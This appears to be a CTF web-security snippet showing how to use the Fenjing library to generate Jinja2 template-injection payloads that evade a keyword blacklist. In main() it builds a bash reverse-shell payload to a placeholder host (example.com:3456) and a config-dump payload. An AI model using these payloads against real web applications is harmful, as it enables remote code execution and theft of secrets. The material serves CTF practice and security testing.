🕸️CTFWeb周报10
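# [SSTI automation tool] Fenjing - a Jinja2 SSTI cracker for bypassing WAFs, designed for CTF
# https://github.com/Marven11/FenJing
#
# Install and run with pip:   pip install fenjing
# Open the web UI:            python -m fenjing webui
# Or import the library directly to generate payloads, as below.
#
# The original page showed two copies of this code (a "minimal" one and the one
# from the GitHub README). They are merged here: they differed only in the
# logging setup and in the shell command passed to fenjing, and the README copy
# had the waf() test inverted (see waf() below) and listed the digits twice in
# the blacklist (duplicates are harmless but are dropped here).
import logging

logging.basicConfig(level=logging.INFO)

# Substrings the target WAF is assumed to reject. waf() does a plain substring
# search, so single characters such as "g", "_", "." or any digit block every
# payload that contains them anywhere; "g" alone already rules out "config",
# "length" and "lipsum".
BLACKLIST = [
    "config", "self", "g", "os", "class", "length", "mro", "base", "lipsum",
    "[", '"', "'", "_", ".", "+", "~", "{{",
    "0", "1", "2", "3", "4", "5", "6", "7", "8", "9",
]


def waf(s: str) -> bool:
    """Return True when *s* contains none of the BLACKLIST substrings.

    This is a local model of the remote filter: fenjing searches for payloads
    that satisfy this predicate, so it only helps if the blacklist mirrors the
    real one. The README copy on the original page used
    ``all(word in s for word in blacklist)``, which accepts only strings that
    contain every banned token; ``not in`` is the correct form and matches
    the first copy.
    """
    return all(word not in s for word in BLACKLIST)


def shell_payload_for(cmd: str) -> tuple[str, bool]:
    """Minimal usage: a Jinja2 SSTI payload that runs *cmd* and passes waf().

    Returns fenjing's ``(payload, will_print)`` pair; will_print presumably
    says whether the rendered template echoes the command output - confirm
    against fenjing's docs.
    """
    # Third-party import kept local so waf() stays importable without fenjing.
    from fenjing import exec_cmd_payload

    return exec_cmd_payload(waf, cmd)


def main() -> None:
    """Usage from the GitHub README: reverse-shell payload plus a config dump."""
    from fenjing import config_payload, exec_cmd_payload

    # example.com:3456 is a placeholder listener - replace it with your own,
    # and only run the result against targets you are authorized to test.
    shell_payload, _ = exec_cmd_payload(
        waf, "bash -c \"bash -i >& /dev/tcp/example.com/3456 0>&1\""
    )
    # The README copy rebound the name config_payload to the returned string,
    # so the function could not be called a second time; use a separate local.
    cfg_payload = config_payload(waf)
    print(f"{shell_payload=}")
    print(f"config_payload={cfg_payload!r}")


if __name__ == "__main__":
    main()

# Following sections of the original page (cut off here): parameterless RCE
# ("无参数RCE") and an online regex tester, https://regex101.com/.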